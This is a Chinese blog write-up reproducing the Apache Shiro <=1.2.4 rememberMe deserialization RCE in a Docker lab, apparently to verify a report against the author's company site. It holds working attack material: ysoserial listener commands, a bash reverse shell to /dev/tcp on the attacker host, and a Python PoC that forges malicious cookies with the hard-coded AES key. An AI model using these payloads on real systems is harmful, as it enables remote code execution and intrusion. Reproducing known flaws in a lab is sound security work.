Apache Shiro<=1.2.4反序列RCE漏洞复现及延伸

最新推荐文章于 2024-04-17 04:34:27 发布
最新推荐文章于 2024-04-17 04:34:27 发布
阅读量505 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46137328/article/details/104322489
版权

最近有白帽子向公司提交了漏洞,说我们公司官网存在shiro反序列化漏洞,作为优秀的word 工程师,同事找到了我(这时候想到我是信息安全工程师招进来的了)。

影响版本

Apache Shiro <= 1.2.4

产生原因

shiro默认使用了

CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化。

然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

payload 构造

前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie。

深入分析见:

https://www.freebuf.com/column/220958.html

既然知道了漏洞原理,我们着手布置漏洞环境,开始复测

首先要有web环境:

攻击主机:192.168.0.106

被攻击主机:192.168.0.105

最初我根据

https://www.seebug.org/vuldb/ssvid-92180这篇文章进行漏洞环境的部署,比较复杂,如果有需要编译好的war可以从百度云盘下载:https://pan.baidu.com/s/1-kC3-aiwcgV2b72eNEVAcg 提取码: pzs3

我们在这里使用docker进行漏洞环境的部署。

#docker pull medicean/vulapps:s_shiro_1

#docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

简简单单两条命令,漏洞环境就部署好了。

登录成功后,可以看到返回包里Set-Cookie中有rememberMe,这就可以试一下shiro漏洞。

ysoserial开启监听

ysoserial是一个java反序列化的工具,攻击机下载ysoserial,获取需要的jar文件:

git clone https://github.com/frohoff/ysoserial.git


cd ysoserial
mvn package -DskipTests

我们需要target目录下的ysoserial-0.0.6-SNAPSHOT-all.jar,使用如下命令打开监听:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 3333 CommonsCollections4 "反弹 shell 需要进行java base64 编码"

我们在http://www.jackson-t.ca/runtime-exec-payloads.html网站,对bash -i >& /dev/tcp/192.168.0.106/777 0>&1编码。

命令执行的效果图:

同时本机打开对777端口的监听:

构建恶意rememberMe:

poc5.py

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES




def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext








if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

我们通过次poc生成恶意的rememberMe:

现在替换正常的rememberMe,向服务器发送恶意的攻击请求:

我们看监听的端口:

已经有shell返回了。

但是反弹shell总归是不安全的做法,我们也可以尝试其他方式证明命令执行已经成功,其中最常用的就是DNSLOG。

我们访问:http://www.dnslog.cn/,生成一个域名,让被攻击主机ping这个域名,如果有DNS日志如下:

则表明漏洞存在。

但是运维人员说shiro已经更新到最新版本了。后来查看漏洞poc中提供的key在github中存在很多处,应该是其他开源框架整合了shiro或者在代码上借鉴所导致的漏洞。

目前已经整理了与此漏洞相关的18个key,如果需要对自身代码进行排查,可后台回复shiro_key进行获取。

xju_lr
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Shiro<=1.2.4序列RCE漏洞
墨痕诉清风的博客
10-09 1263
因为shiro对cookie里的rememberme字段进行了序列化,所以如果知道了shiro的编码方式,然后将恶意命令用它的编码方式进行编码并放在http头的cookie里,在shiro对提交的cookie的rememberme字段进行序列化时,也就执行了插入的命令,最终造成了命令执行。Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。的,就导致了攻击者可以构造恶意数据造成序列化的RCE漏洞。,已经有人准备好了的。...
shrio序列漏洞修复_Shiro RememberMe 1.2.4 序列漏洞详细复现
weixin_33603377的博客
01-17 1275
目前已出图形化界面工具,一键即可检测和getshell工具地址:https://github.com/feihong-cs/ShiroExploit使用案例:分割线(以上内容为最新更新内容)—————————————————————————————————————————————————————————————————————————————————————————————————————————...
Shiro漏洞复现
懂进攻知防守
07-29 1525
Apache Shiro 框架提供了记住密码的功能( RememberMe ),关闭浏览器再次访问时无需再登录即可访问。用户登录成功后用户信息会经过加密编码后存储在 cookie中。在 Cookie 读取过程中有用 AES 对 Cookie 值解密的过程,对于 AES 这类对称加密算法,一旦秘钥泄露加密便形同虚设。......
apache shiro 序列漏洞解决方案_apache shiro序列化解决方法
最新发布
2301_79056657的博客
04-17 1345
这个通过观察shiro1.2.4版本的源代码可以发现,如果不指定密钥,shiro会默认一个初始化密钥,该密钥是被硬编码在代码中,由于代码是开源的,攻击者很容易找到该密钥,并且伪造cookie发起攻击。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。注意 这是在使用shiro默认密钥的情况下,如果应用修改了默认密钥则需要保证该密钥不是公开的,并妥善保管防止泄露。
shiro序列漏洞复现
m0_67391683的博客
08-24 380
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再序列化,就导致了序列RCE漏洞
ShiroExploit.V2.3rce图形化利用.zip
06-25
ShiroExploit.V2.3 shiro远程命令执行 550 721 一键漏洞利用 rce 图形化利用.zip
shiro-1.2.4-rce:shiro <= 1.2.4序列化命令脚本
05-22
= 1.2.4 序列化远程命令执行利用脚本 使用延时判断key和gadget,即使目标不出网也可以检测是否存在漏洞 python脚本需要调用ysoserial-sleep.jar,ysoserial-sleep.jar文件并不是原版的,增加了延时命令功能,故...
SHIRO-550:Shiro RememberMe 1.2.4序列化突破
03-10
Shiro RememberMe 1.2.4序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
Apache shiro1.2.4序列漏洞介绍.docx
07-01
Apache shiro1.2.4序列漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
ShiroScan:Shiro <= 1.2.4排序,Ichikagi测量工具
05-07
=1.2.4序列化,一键检测工具 2021·1·15: 改动内容:1.删除CC8利用链 改动内容:2.新增xray总结的k1到k4这4个利用链 改动内容:3.新增Jdk8u20的利用链 改动内容:4.新增GCM加密发包 过往: 改动内容:1.新增17个...
Shiro序列漏洞Shiro版本升级资源
06-22
shiro版本<=1.2.4时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后序列化。但在这个过程中,其AES的Key硬编码,导致序列化...
shiro_rce_tool:shiro rce tool 序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --> default: rememberMe 2020-10-16: 放出来一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro 3、目标服务器不出网的情况下探测 2020-08-21: 新增了cc8 cc9 cc10利用链 新增了输出payload模式,在执行命令的时候输入output=on即可。 参考下面的示例 2020-05-26: 原来的停止服务了,请下载最新版本。
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )
good good study
03-28 9489
Shiro 1.2.4 序列漏洞
shiro1.2.4序列漏洞(CVE-2016-4437)的问题分析(一)
donggongai的博客
07-26 1269
在某个项目中依赖了shiro1.2.4,结果收到了网警的一纸警告,警告上明确写道存在CVE-2016-4437以及造成此漏洞的罪魁祸首是使用了
面试答辩
qq_43207114的博客
10-27 525
面试介绍 项目 我最近做了一个cms内容管理系统的项目,他是一个位于Web前端与创作或编辑的后端之间的软件系统,这里的内容可以指创作人员,编辑人员,发布人员来提交、修改、审批、发布内容,这里的“内容”可能包括文件、图片、表格、数据库中的数据甚至可以是视频等一切你想要发送到Internet以及Extranet网站的信息。 面试可能遇到的问题 Spring常用注解 ***实例化对象的:***@Controller,@Service, @Repository[它用于将数据访问层 (DAO 层 ) 的类标识为 Sp
Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)
Bird&Bird
03-11 655
Apache Shiro框架提供了记住我(rememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManage类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码。
armitage识别不了漏洞_工具分享 | shiro漏洞检测RCE工具
weixin_39895181的博客
11-19 169
0x00 前言最近在做shiro序列漏洞复现,从网上也找了一堆复现文章和工具,但是这些工具用着都不太舒服,于是参考网上大佬们的工具,自己进行了一些简单的改良。0x01 工具安装本工具需要 Python3 和 Java 环境,下载本工具后,将文件解压,在本项目目录下运行下面的命令,安装Python第三方库即可。pip3 install -r requirements.txt国外下载地址...
Shiro框架漏洞分析与复现
未完成的歌~的博客
05-15 3974
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
Apache Shiro之-------------从入门到入土!!!(教程)
萝卜坑
12-25 676
什么是shiro??? Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 主要功能 三个核心组件:Subject, SecurityManager 和 Realms. Subject:即“当前操作用户”。但是,在Shiro中,S...
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值